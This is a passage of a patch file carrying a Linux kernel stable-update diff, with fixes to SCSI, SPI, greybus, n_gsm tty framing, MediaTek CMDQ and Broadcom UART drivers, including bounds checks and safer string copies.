+ 	h->desc = *d;
++	h->desc.name = devm_kstrdup(dev, d->name, GFP_KERNEL);
++	if (!h->desc.name)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	ret = init_rdev_state(dev, h, rdev, common_errs, per_rdev_errs,
+ 			      rdev_amount);
+diff --git a/drivers/regulator/vqmmc-ipq4019-regulator.c b/drivers/regulator/vqmmc-ipq4019-regulator.c
+index c4213f096fe57..4f470b2d66c97 100644
+--- a/drivers/regulator/vqmmc-ipq4019-regulator.c
++++ b/drivers/regulator/vqmmc-ipq4019-regulator.c
+@@ -84,6 +84,7 @@ static const struct of_device_id regulator_ipq4019_of_match[] = {
+ 	{ .compatible = "qcom,vqmmc-ipq4019-regulator", },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, regulator_ipq4019_of_match);
+ 
+ static struct platform_driver ipq4019_regulator_driver = {
+ 	.probe = ipq4019_regulator_probe,
+diff --git a/drivers/s390/cio/trace.h b/drivers/s390/cio/trace.h
+index 86993de253451..a4c5c6736b310 100644
+--- a/drivers/s390/cio/trace.h
++++ b/drivers/s390/cio/trace.h
+@@ -50,7 +50,7 @@ DECLARE_EVENT_CLASS(s390_class_schib,
+ 		__entry->devno = schib->pmcw.dev;
+ 		__entry->schib = *schib;
+ 		__entry->pmcw_ena = schib->pmcw.ena;
+-		__entry->pmcw_st = schib->pmcw.ena;
++		__entry->pmcw_st = schib->pmcw.st;
+ 		__entry->pmcw_dnv = schib->pmcw.dnv;
+ 		__entry->pmcw_dev = schib->pmcw.dev;
+ 		__entry->pmcw_lpm = schib->pmcw.lpm;
+diff --git a/drivers/scsi/bfa/bfad_debugfs.c b/drivers/scsi/bfa/bfad_debugfs.c
+index 52db147d9979d..f6dd077d47c9a 100644
+--- a/drivers/scsi/bfa/bfad_debugfs.c
++++ b/drivers/scsi/bfa/bfad_debugfs.c
+@@ -250,7 +250,7 @@ bfad_debugfs_write_regrd(struct file *file, const char __user *buf,
+ 	unsigned long flags;
+ 	void *kern_buf;
+ 
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+@@ -317,7 +317,7 @@ bfad_debugfs_write_regwr(struct file *file, const char __user *buf,
+ 	unsigned long flags;
+ 	void *kern_buf;
+ 
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+diff --git a/drivers/scsi/hpsa.c b/drivers/scsi/hpsa.c
+index f6da34850af9d..e529b3d3eaf39 100644
+--- a/drivers/scsi/hpsa.c
++++ b/drivers/scsi/hpsa.c
+@@ -5850,7 +5850,7 @@ static int hpsa_scsi_host_alloc(struct ctlr_info *h)
+ {
+ 	struct Scsi_Host *sh;
+ 
+-	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(struct ctlr_info));
++	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(struct ctlr_info *));
+ 	if (sh == NULL) {
+ 		dev_err(&h->pdev->dev, "scsi_host_alloc failed\n");
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
+index 4b5ceba68e46e..ffec7f0e51fcd 100644
+--- a/drivers/scsi/libsas/sas_expander.c
++++ b/drivers/scsi/libsas/sas_expander.c
+@@ -239,8 +239,7 @@ static void sas_set_ex_phy(struct domain_device *dev, int phy_id,
+ 	/* help some expanders that fail to zero sas_address in the 'no
+ 	 * device' case
+ 	 */
+-	if (phy->attached_dev_type == SAS_PHY_UNUSED ||
+-	    phy->linkrate < SAS_LINK_RATE_1_5_GBPS)
++	if (phy->attached_dev_type == SAS_PHY_UNUSED)
+ 		memset(phy->attached_sas_addr, 0, SAS_ADDR_SIZE);
+ 	else
+ 		memcpy(phy->attached_sas_addr, dr->attached_sas_addr, SAS_ADDR_SIZE);
+diff --git a/drivers/scsi/qedf/qedf_debugfs.c b/drivers/scsi/qedf/qedf_debugfs.c
+index 451fd236bfd05..96174353e3898 100644
+--- a/drivers/scsi/qedf/qedf_debugfs.c
++++ b/drivers/scsi/qedf/qedf_debugfs.c
+@@ -170,7 +170,7 @@ qedf_dbg_debug_cmd_write(struct file *filp, const char __user *buffer,
+ 	if (!count || *ppos)
+ 		return 0;
+ 
+-	kern_buf = memdup_user(buffer, count);
++	kern_buf = memdup_user_nul(buffer, count);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index a7a364760b800..081af4d420a05 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -274,7 +274,7 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 		seq_printf(s, "Driver: estimate iocb used [%d] high water limit [%d]\n",
+ 			   iocbs_used, ha->base_qpair->fwres.iocbs_limit);
+ 
+-		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
++		seq_printf(s, "estimate exchange used[%d] high water limit [%d]\n",
+ 			   exch_used, ha->base_qpair->fwres.exch_limit);
+ 
+ 		if (ql2xenforce_iocb_limit == 2) {
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index c64e44964d840..6dce3f166564c 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -5144,7 +5144,7 @@ qla2x00_set_model_info(scsi_qla_host_t *vha, uint8_t *model, size_t len,
+ 		if (use_tbl &&
+ 		    ha->pdev->subsystem_vendor == PCI_VENDOR_ID_QLOGIC &&
+ 		    index < QLA_MODEL_NAMES)
+-			strlcpy(ha->model_desc,
++			strscpy(ha->model_desc,
+ 			    qla2x00_model_name[index * 2 + 1],
+ 			    sizeof(ha->model_desc));
+ 	} else {
+@@ -5152,14 +5152,14 @@ qla2x00_set_model_info(scsi_qla_host_t *vha, uint8_t *model, size_t len,
+ 		if (use_tbl &&
+ 		    ha->pdev->subsystem_vendor == PCI_VENDOR_ID_QLOGIC &&
+ 		    index < QLA_MODEL_NAMES) {
+-			strlcpy(ha->model_number,
++			strscpy(ha->model_number,
+ 				qla2x00_model_name[index * 2],
+ 				sizeof(ha->model_number));
+-			strlcpy(ha->model_desc,
++			strscpy(ha->model_desc,
+ 			    qla2x00_model_name[index * 2 + 1],
+ 			    sizeof(ha->model_desc));
+ 		} else {
+-			strlcpy(ha->model_number, def,
++			strscpy(ha->model_number, def,
+ 				sizeof(ha->model_number));
+ 		}
+ 	}
+diff --git a/drivers/scsi/qla2xxx/qla_mr.c b/drivers/scsi/qla2xxx/qla_mr.c
+index f726eb8449c5e..083f94e43fba0 100644
+--- a/drivers/scsi/qla2xxx/qla_mr.c
++++ b/drivers/scsi/qla2xxx/qla_mr.c
+@@ -691,7 +691,7 @@ qlafx00_pci_info_str(struct scsi_qla_host *vha, char *str, size_t str_len)
+ 	struct qla_hw_data *ha = vha->hw;
+ 
+ 	if (pci_is_pcie(ha->pdev))
+-		strlcpy(str, "PCIe iSA", str_len);
++		strscpy(str, "PCIe iSA", str_len);
+ 	return str;
+ }
+ 
+@@ -1850,21 +1850,21 @@ qlafx00_fx_disc(scsi_qla_host_t *vha, fc_port_t *fcport, uint16_t fx_type)
+ 			phost_info = &preg_hsi->hsi;
+ 			memset(preg_hsi, 0, sizeof(struct register_host_info));
+ 			phost_info->os_type = OS_TYPE_LINUX;
+-			strlcpy(phost_info->sysname, p_sysid->sysname,
++			strscpy(phost_info->sysname, p_sysid->sysname,
+ 				sizeof(phost_info->sysname));
+-			strlcpy(phost_info->nodename, p_sysid->nodename,
++			strscpy(phost_info->nodename, p_sysid->nodename,
+ 				sizeof(phost_info->nodename));
+ 			if (!strcmp(phost_info->nodename, "(none)"))
+ 				ha->mr.host_info_resend = true;
+-			strlcpy(phost_info->release, p_sysid->release,
++			strscpy(phost_info->release, p_sysid->release,
+ 				sizeof(phost_info->release));
+-			strlcpy(phost_info->version, p_sysid->version,
++			strscpy(phost_info->version, p_sysid->version,
+ 				sizeof(phost_info->version));
+-			strlcpy(phost_info->machine, p_sysid->machine,
++			strscpy(phost_info->machine, p_sysid->machine,
+ 				sizeof(phost_info->machine));
+-			strlcpy(phost_info->domainname, p_sysid->domainname,
++			strscpy(phost_info->domainname, p_sysid->domainname,
+ 				sizeof(phost_info->domainname));
+-			strlcpy(phost_info->hostdriver, QLA2XXX_VERSION,
++			strscpy(phost_info->hostdriver, QLA2XXX_VERSION,
+ 				sizeof(phost_info->hostdriver));
+ 			preg_hsi->utc = (uint64_t)ktime_get_real_seconds();
+ 			ql_dbg(ql_dbg_init, vha, 0x0149,
+@@ -1909,9 +1909,9 @@ qlafx00_fx_disc(scsi_qla_host_t *vha, fc_port_t *fcport, uint16_t fx_type)
+ 	if (fx_type == FXDISC_GET_CONFIG_INFO) {
+ 		struct config_info_data *pinfo =
+ 		    (struct config_info_data *) fdisc->u.fxiocb.rsp_addr;
+-		strlcpy(vha->hw->model_number, pinfo->model_num,
++		strscpy(vha->hw->model_number, pinfo->model_num,
+ 			ARRAY_SIZE(vha->hw->model_number));
+-		strlcpy(vha->hw->model_desc, pinfo->model_description,
++		strscpy(vha->hw->model_desc, pinfo->model_description,
+ 			ARRAY_SIZE(vha->hw->model_desc));
+ 		memcpy(&vha->hw->mr.symbolic_name, pinfo->symbolic_name,
+ 		    sizeof(vha->hw->mr.symbolic_name));
+diff --git a/drivers/soc/mediatek/mtk-cmdq-helper.c b/drivers/soc/mediatek/mtk-cmdq-helper.c
+index c1837a4682673..3ed8bd63f7e14 100644
+--- a/drivers/soc/mediatek/mtk-cmdq-helper.c
++++ b/drivers/soc/mediatek/mtk-cmdq-helper.c
+@@ -13,7 +13,8 @@
+ #define CMDQ_POLL_ENABLE_MASK	BIT(0)
+ #define CMDQ_EOC_IRQ_EN		BIT(0)
+ #define CMDQ_REG_TYPE		1
+-#define CMDQ_JUMP_RELATIVE	1
++#define CMDQ_JUMP_RELATIVE	0
++#define CMDQ_JUMP_ABSOLUTE	1
+ 
+ struct cmdq_instruction {
+ 	union {
+@@ -396,7 +397,7 @@ int cmdq_pkt_jump(struct cmdq_pkt *pkt, dma_addr_t addr)
+ 	struct cmdq_instruction inst = {};
+ 
+ 	inst.op = CMDQ_CODE_JUMP;
+-	inst.offset = CMDQ_JUMP_RELATIVE;
++	inst.offset = CMDQ_JUMP_ABSOLUTE;
+ 	inst.value = addr >>
+ 		cmdq_get_shift_pa(((struct cmdq_client *)pkt->cl)->chan);
+ 	return cmdq_pkt_append_command(pkt, inst);
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index 7286c9b3be691..5bd874e58dd6e 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -1847,7 +1847,7 @@ struct sdw_cdns_pdi *sdw_cdns_alloc_pdi(struct sdw_cdns *cdns,
+ 
+ 	/* check if we found a PDI, else find in bi-directional */
+ 	if (!pdi)
+-		pdi = cdns_find_pdi(cdns, 2, stream->num_bd, stream->bd,
++		pdi = cdns_find_pdi(cdns, 0, stream->num_bd, stream->bd,
+ 				    dai_id);
+ 
+ 	if (pdi) {
+diff --git a/drivers/spi/spi-stm32.c b/drivers/spi/spi-stm32.c
+index 12241815510d4..c37d557f7d03c 100644
+--- a/drivers/spi/spi-stm32.c
++++ b/drivers/spi/spi-stm32.c
+@@ -884,7 +884,7 @@ static irqreturn_t stm32h7_spi_irq_thread(int irq, void *dev_id)
+ 		mask |= STM32H7_SPI_SR_TXP | STM32H7_SPI_SR_RXP;
+ 
+ 	if (!(sr & mask)) {
+-		dev_warn(spi->dev, "spurious IT (sr=0x%08x, ier=0x%08x)\n",
++		dev_vdbg(spi->dev, "spurious IT (sr=0x%08x, ier=0x%08x)\n",
+ 			 sr, ier);
+ 		spin_unlock_irqrestore(&spi->lock, flags);
+ 		return IRQ_NONE;
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 1018feff468c9..50fe5aa450f84 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -1147,6 +1147,7 @@ static int __spi_map_msg(struct spi_controller *ctlr, struct spi_message *msg)
+ 	else
+ 		rx_dev = ctlr->dev.parent;
+ 
++	ret = -ENOMSG;
+ 	list_for_each_entry(xfer, &msg->transfers, transfer_list) {
+ 		/* The sync is done before each transfer. */
+ 		unsigned long attrs = DMA_ATTR_SKIP_CPU_SYNC;
+@@ -1176,6 +1177,9 @@ static int __spi_map_msg(struct spi_controller *ctlr, struct spi_message *msg)
+ 			}
+ 		}
+ 	}
++	/* No transfer has been mapped, bail out with success */
++	if (ret)
++		return 0;
+ 
+ 	ctlr->cur_rx_dma_dev = rx_dev;
+ 	ctlr->cur_tx_dma_dev = tx_dev;
+diff --git a/drivers/staging/greybus/arche-apb-ctrl.c b/drivers/staging/greybus/arche-apb-ctrl.c
+index 45afa208d0044..4f9403f3d0cdd 100644
+--- a/drivers/staging/greybus/arche-apb-ctrl.c
++++ b/drivers/staging/greybus/arche-apb-ctrl.c
+@@ -468,6 +468,7 @@ static const struct of_device_id arche_apb_ctrl_of_match[] = {
+ 	{ .compatible = "usbffff,2", },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, arche_apb_ctrl_of_match);
+ 
+ static struct platform_driver arche_apb_ctrl_device_driver = {
+ 	.probe		= arche_apb_ctrl_probe,
+diff --git a/drivers/staging/greybus/arche-platform.c b/drivers/staging/greybus/arche-platform.c
+index fcbd5f71eff27..4850bc64d3fd7 100644
+--- a/drivers/staging/greybus/arche-platform.c
++++ b/drivers/staging/greybus/arche-platform.c
+@@ -620,14 +620,7 @@ static const struct of_device_id arche_platform_of_match[] = {
+ 	{ .compatible = "google,arche-platform", },
+ 	{ },
+ };
+-
+-static const struct of_device_id arche_combined_id[] = {
+-	/* Use PID/VID of SVC device */
+-	{ .compatible = "google,arche-platform", },
+-	{ .compatible = "usbffff,2", },
+-	{ },
+-};
+-MODULE_DEVICE_TABLE(of, arche_combined_id);
++MODULE_DEVICE_TABLE(of, arche_platform_of_match);
+ 
+ static struct platform_driver arche_platform_device_driver = {
+ 	.probe		= arche_platform_probe,
+diff --git a/drivers/staging/greybus/light.c b/drivers/staging/greybus/light.c
+index c6bd86a5335ab..9999f84016992 100644
+--- a/drivers/staging/greybus/light.c
++++ b/drivers/staging/greybus/light.c
+@@ -147,6 +147,9 @@ static int __gb_lights_flash_brightness_set(struct gb_channel *channel)
+ 		channel = get_channel_from_mode(channel->light,
+ 						GB_CHANNEL_MODE_TORCH);
+ 
++	if (!channel)
++		return -EINVAL;
++
+ 	/* For not flash we need to convert brightness to intensity */
+ 	intensity = channel->intensity_uA.min +
+ 			(channel->intensity_uA.step * channel->led->brightness);
+@@ -549,7 +552,10 @@ static int gb_lights_light_v4l2_register(struct gb_light *light)
+ 	}
+ 
+ 	channel_flash = get_channel_from_mode(light, GB_CHANNEL_MODE_FLASH);
+-	WARN_ON(!channel_flash);
++	if (!channel_flash) {
++		dev_err(dev, "failed to get flash channel from mode\n");
++		return -EINVAL;
++	}
+ 
+ 	fled = &channel_flash->fled;
+ 
+diff --git a/drivers/staging/media/atomisp/pci/sh_css.c b/drivers/staging/media/atomisp/pci/sh_css.c
+index da96aaffebc19..738c0d634ea90 100644
+--- a/drivers/staging/media/atomisp/pci/sh_css.c
++++ b/drivers/staging/media/atomisp/pci/sh_css.c
+@@ -4972,6 +4972,7 @@ static int load_video_binaries(struct ia_css_pipe *pipe)
+ 						  sizeof(struct ia_css_binary),
+ 						  GFP_KERNEL);
+ 		if (!mycs->yuv_scaler_binary) {
++			mycs->num_yuv_scaler = 0;
+ 			err = -ENOMEM;
+ 			return err;
+ 		}
+diff --git a/drivers/thermal/qcom/tsens.c b/drivers/thermal/qcom/tsens.c
+index 252c5ffdd1b66..fc58db60852a0 100644
+--- a/drivers/thermal/qcom/tsens.c
++++ b/drivers/thermal/qcom/tsens.c
+@@ -85,7 +85,7 @@ void compute_intercept_slope(struct tsens_priv *priv, u32 *p1,
+ 	for (i = 0; i < priv->num_sensors; i++) {
+ 		dev_dbg(priv->dev,
+ 			"%s: sensor%d - data_point1:%#x data_point2:%#x\n",
+-			__func__, i, p1[i], p2[i]);
++			__func__, i, p1[i], p2 ? p2[i] : 0);
+ 
+ 		if (!priv->sensor[i].slope)
+ 			priv->sensor[i].slope = SLOPE_DEFAULT;
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index d2daf0a72e347..9997d73d5f568 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -202,16 +202,18 @@ enum gsm_encoding {
+ 
+ enum gsm_mux_state {
+ 	GSM_SEARCH,
+-	GSM_START,
+-	GSM_ADDRESS,
+-	GSM_CONTROL,
+-	GSM_LEN,
+-	GSM_DATA,
+-	GSM_FCS,
+-	GSM_OVERRUN,
+-	GSM_LEN0,
+-	GSM_LEN1,
+-	GSM_SSOF,
++	GSM0_ADDRESS,
++	GSM0_CONTROL,
++	GSM0_LEN0,
++	GSM0_LEN1,
++	GSM0_DATA,
++	GSM0_FCS,
++	GSM0_SSOF,
++	GSM1_START,
++	GSM1_ADDRESS,
++	GSM1_CONTROL,
++	GSM1_DATA,
++	GSM1_OVERRUN,
+ };
+ 
+ /*
+@@ -2259,6 +2261,30 @@ static void gsm_queue(struct gsm_mux *gsm)
+ 	return;
+ }
+ 
++/**
++ * gsm0_receive_state_check_and_fix	-	check and correct receive state
++ * @gsm: gsm data for this ldisc instance
++ *
++ * Ensures that the current receive state is valid for basic option mode.
++ */
++
++static void gsm0_receive_state_check_and_fix(struct gsm_mux *gsm)
++{
++	switch (gsm->state) {
++	case GSM_SEARCH:
++	case GSM0_ADDRESS:
++	case GSM0_CONTROL:
++	case GSM0_LEN0:
++	case GSM0_LEN1:
++	case GSM0_DATA:
++	case GSM0_FCS:
++	case GSM0_SSOF:
++		break;
++	default:
++		gsm->state = GSM_SEARCH;
++		break;
++	}
++}
+ 
+ /**
+  *	gsm0_receive	-	perform processing for non-transparency
+@@ -2272,26 +2298,27 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ {
+ 	unsigned int len;
+ 
++	gsm0_receive_state_check_and_fix(gsm);
+ 	switch (gsm->state) {
+ 	case GSM_SEARCH:	/* SOF marker */
+ 		if (c == GSM0_SOF) {
+-			gsm->state = GSM_ADDRESS;
++			gsm->state = GSM0_ADDRESS;
+ 			gsm->address = 0;
+ 			gsm->len = 0;
+ 			gsm->fcs = INIT_FCS;
+ 		}
+ 		break;
+-	case GSM_ADDRESS:	/* Address EA */
++	case GSM0_ADDRESS:	/* Address EA */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		if (gsm_read_ea(&gsm->address, c))
+-			gsm->state = GSM_CONTROL;
++			gsm->state = GSM0_CONTROL;
+ 		break;
+-	case GSM_CONTROL:	/* Control Byte */
++	case GSM0_CONTROL:	/* Control Byte */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		gsm->control = c;
+-		gsm->state = GSM_LEN0;
++		gsm->state = GSM0_LEN0;
+ 		break;
+-	case GSM_LEN0:		/* Length EA */
++	case GSM0_LEN0:		/* Length EA */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		if (gsm_read_ea(&gsm->len, c)) {
+ 			if (gsm->len > gsm->mru) {
+@@ -2301,14 +2328,14 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 			}
+ 			gsm->count = 0;
+ 			if (!gsm->len)
+-				gsm->state = GSM_FCS;
++				gsm->state = GSM0_FCS;
+ 			else
+-				gsm->state = GSM_DATA;
++				gsm->state = GSM0_DATA;
+ 			break;
+ 		}
+-		gsm->state = GSM_LEN1;
++		gsm->state = GSM0_LEN1;
+ 		break;
+-	case GSM_LEN1:
++	case GSM0_LEN1:
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		len = c;
+ 		gsm->len |= len << 7;
+@@ -2319,26 +2346,29 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 		}
+ 		gsm->count = 0;
+ 		if (!gsm->len)
+-			gsm->state = GSM_FCS;
++			gsm->state = GSM0_FCS;
+ 		else
+-			gsm->state = GSM_DATA;
++			gsm->state = GSM0_DATA;
+ 		break;
+-	case GSM_DATA:		/* Data */
++	case GSM0_DATA:		/* Data */
+ 		gsm->buf[gsm->count++] = c;
+-		if (gsm->count == gsm->len) {
++		if (gsm->count >= MAX_MRU) {
++			gsm->bad_size++;
++			gsm->state = GSM_SEARCH;
++		} else if (gsm->count >= gsm->len) {
+ 			/* Calculate final FCS for UI frames over all data */
+ 			if ((gsm->control & ~PF) != UIH) {
+ 				gsm->fcs = gsm_fcs_add_block(gsm->fcs, gsm->buf,
+ 							     gsm->count);
+ 			}
+-			gsm->state = GSM_FCS;
++			gsm->state = GSM0_FCS;
+ 		}
+ 		break;
+-	case GSM_FCS:		/* FCS follows the packet */
++	case GSM0_FCS:		/* FCS follows the packet */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+-		gsm->state = GSM_SSOF;
++		gsm->state = GSM0_SSOF;
+ 		break;
+-	case GSM_SSOF:
++	case GSM0_SSOF:
+ 		gsm->state = GSM_SEARCH;
+ 		if (c == GSM0_SOF)
+ 			gsm_queue(gsm);
+@@ -2351,6 +2381,29 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 	}
+ }
+ 
++/**
++ * gsm1_receive_state_check_and_fix	-	check and correct receive state
++ * @gsm: gsm data for this ldisc instance
++ *
++ * Ensures that the current receive state is valid for advanced option mode.
++ */
++
++static void gsm1_receive_state_check_and_fix(struct gsm_mux *gsm)
++{
++	switch (gsm->state) {
++	case GSM_SEARCH:
++	case GSM1_START:
++	case GSM1_ADDRESS:
++	case GSM1_CONTROL:
++	case GSM1_DATA:
++	case GSM1_OVERRUN:
++		break;
++	default:
++		gsm->state = GSM_SEARCH;
++		break;
++	}
++}
++
+ /**
+  *	gsm1_receive	-	perform processing for non-transparency
+  *	@gsm: gsm data for this ldisc instance
+@@ -2361,6 +2414,7 @@ static void gsm0_receive(struct gsm_mux *gsm, unsigned char c)
+ 
+ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ {
++	gsm1_receive_state_check_and_fix(gsm);
+ 	/* handle XON/XOFF */
+ 	if ((c & ISO_IEC_646_MASK) == XON) {
+ 		gsm->constipated = true;
+@@ -2373,11 +2427,11 @@ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ 	}
+ 	if (c == GSM1_SOF) {
+ 		/* EOF is only valid in frame if we have got to the data state */
+-		if (gsm->state == GSM_DATA) {
++		if (gsm->state == GSM1_DATA) {
+ 			if (gsm->count < 1) {
+ 				/* Missing FSC */
+ 				gsm->malformed++;
+-				gsm->state = GSM_START;
++				gsm->state = GSM1_START;
+ 				return;
+ 			}
+ 			/* Remove the FCS from data */
+@@ -2393,14 +2447,14 @@ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ 			gsm->fcs = gsm_fcs_add(gsm->fcs, gsm->buf[gsm->count]);
+ 			gsm->len = gsm->count;
+ 			gsm_queue(gsm);
+-			gsm->state  = GSM_START;
++			gsm->state  = GSM1_START;
+ 			return;
+ 		}
+ 		/* Any partial frame was a runt so go back to start */
+-		if (gsm->state != GSM_START) {
++		if (gsm->state != GSM1_START) {
+ 			if (gsm->state != GSM_SEARCH)
+ 				gsm->malformed++;
+-			gsm->state = GSM_START;
++			gsm->state = GSM1_START;
+ 		}
+ 		/* A SOF in GSM_START means we are still reading idling or
+ 		   framing bytes */
+@@ -2421,30 +2475,30 @@ static void gsm1_receive(struct gsm_mux *gsm, unsigned char c)
+ 		gsm->escape = false;
+ 	}
+ 	switch (gsm->state) {
+-	case GSM_START:		/* First byte after SOF */
++	case GSM1_START:		/* First byte after SOF */
+ 		gsm->address = 0;
+-		gsm->state = GSM_ADDRESS;
++		gsm->state = GSM1_ADDRESS;
+ 		gsm->fcs = INIT_FCS;
+ 		fallthrough;
+-	case GSM_ADDRESS:	/* Address continuation */
++	case GSM1_ADDRESS:	/* Address continuation */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		if (gsm_read_ea(&gsm->address, c))
+-			gsm->state = GSM_CONTROL;
++			gsm->state = GSM1_CONTROL;
+ 		break;
+-	case GSM_CONTROL:	/* Control Byte */
++	case GSM1_CONTROL:	/* Control Byte */
+ 		gsm->fcs = gsm_fcs_add(gsm->fcs, c);
+ 		gsm->control = c;
+ 		gsm->count = 0;
+-		gsm->state = GSM_DATA;
++		gsm->state = GSM1_DATA;
+ 		break;
+-	case GSM_DATA:		/* Data */
+-		if (gsm->count > gsm->mru) {	/* Allow one for the FCS */
+-			gsm->state = GSM_OVERRUN;
++	case GSM1_DATA:		/* Data */
++		if (gsm->count > gsm->mru || gsm->count > MAX_MRU) {	/* Allow one for the FCS */
++			gsm->state = GSM1_OVERRUN;
+ 			gsm->bad_size++;
+ 		} else
+ 			gsm->buf[gsm->count++] = c;
+ 		break;
+-	case GSM_OVERRUN:	/* Over-long - eg a dropped SOF */
++	case GSM1_OVERRUN:	/* Over-long - eg a dropped SOF */
+ 		break;
+ 	default:
+ 		pr_debug("%s: unhandled state: %d\n", __func__, gsm->state);
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index ffc7f67e27e35..a28f115f6194b 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -674,18 +674,46 @@ static void init_real_clk_rates(struct device *dev, struct brcmuart_priv *priv)
+ 	clk_set_rate(priv->baud_mux_clk, priv->default_mux_rate);
+ }
+ 
++static u32 find_quot(struct device *dev, u32 freq, u32 baud, u32 *percent)
++{
++	u32 quot;
++	u32 rate;
++	u64 hires_rate;
++	u64 hires_baud;
++	u64 hires_err;
++
++	rate = freq / 16;
++	quot = DIV_ROUND_CLOSEST(rate, baud);
++	if (!quot)
++		return 0;
++
++	/* increase resolution to get xx.xx percent */
++	hires_rate = div_u64((u64)rate * 10000, (u64)quot);
++	hires_baud = (u64)baud * 10000;
++
++	/* get the delta */
++	if (hires_rate > hires_baud)
++		hires_err = (hires_rate - hires_baud);
++	else
++		hires_err = (hires_baud - hires_rate);
++
++	*percent = (unsigned long)DIV_ROUND_CLOSEST_ULL(hires_err, baud);
++
++	dev_dbg(dev, "Baud rate: %u, MUX Clk: %u, Error: %u.%u%%\n",
++		baud, freq, *percent / 100, *percent % 100);
++
++	return quot;
++}
++
+ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 			u32 baud)
+ {
+ 	u32 percent;
+ 	u32 best_percent = UINT_MAX;
+ 	u32 quot;
++	u32 freq;
+ 	u32 best_quot = 1;
+-	u32 rate;
+-	int best_index = -1;
+-	u64 hires_rate;
+-	u64 hires_baud;
+-	u64 hires_err;
++	u32 best_freq = 0;
+ 	int rc;
+ 	int i;
+ 	int real_baud;
+@@ -694,44 +722,35 @@ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 	if (priv->baud_mux_clk == NULL)
+ 		return;
+ 
+-	/* Find the closest match for specified baud */
+-	for (i = 0; i < ARRAY_SIZE(priv->real_rates); i++) {
+-		if (priv->real_rates[i] == 0)
+-			continue;
+-		rate = priv->real_rates[i] / 16;
+-		quot = DIV_ROUND_CLOSEST(rate, baud);
+-		if (!quot)
+-			continue;
+-
+-		/* increase resolution to get xx.xx percent */
+-		hires_rate = (u64)rate * 10000;
+-		hires_baud = (u64)baud * 10000;
+-
+-		hires_err = div_u64(hires_rate, (u64)quot);
+-
+-		/* get the delta */
+-		if (hires_err > hires_baud)
+-			hires_err = (hires_err - hires_baud);
+-		else
+-			hires_err = (hires_baud - hires_err);
+-
+-		percent = (unsigned long)DIV_ROUND_CLOSEST_ULL(hires_err, baud);
+-		dev_dbg(up->dev,
+-			"Baud rate: %u, MUX Clk: %u, Error: %u.%u%%\n",
+-			baud, priv->real_rates[i], percent / 100,
+-			percent % 100);
+-		if (percent < best_percent) {
+-			best_percent = percent;
+-			best_index = i;
+-			best_quot = quot;
++	/* Try default_mux_rate first */
++	quot = find_quot(up->dev, priv->default_mux_rate, baud, &percent);
++	if (quot) {
++		best_percent = percent;
++		best_freq = priv->default_mux_rate;
++		best_quot = quot;
++	}
++	/* If more than 1% error, find the closest match for specified baud */
++	if (best_percent > 100) {
++		for (i = 0; i < ARRAY_SIZE(priv->real_rates); i++) {
++			freq = priv->real_rates[i];
++			if (freq == 0 || freq == priv->default_mux_rate)
++				continue;
++			quot = find_quot(up->dev, freq, baud, &percent);
++			if (!quot)
++				continue;
++
++			if (percent < best_percent) {
++				best_percent = percent;
++				best_freq = freq;
++				best_quot = quot;
++			}
+ 		}
+ 	}
+-	if (best_index == -1) {
++	if (!best_freq) {
+ 		dev_err(up->dev, "Error, %d BAUD rate is too fast.\n", baud);
+ 		return;
+ 	}
+-	rate = priv->real_rates[best_index];
+-	rc = clk_set_rate(priv->baud_mux_clk, rate);
++	rc = clk_set_rate(priv->baud_mux_clk, best_freq);
+ 	if (rc)
+ 		dev_err(up->dev, "Error selecting BAUD MUX clock\n");
+ 
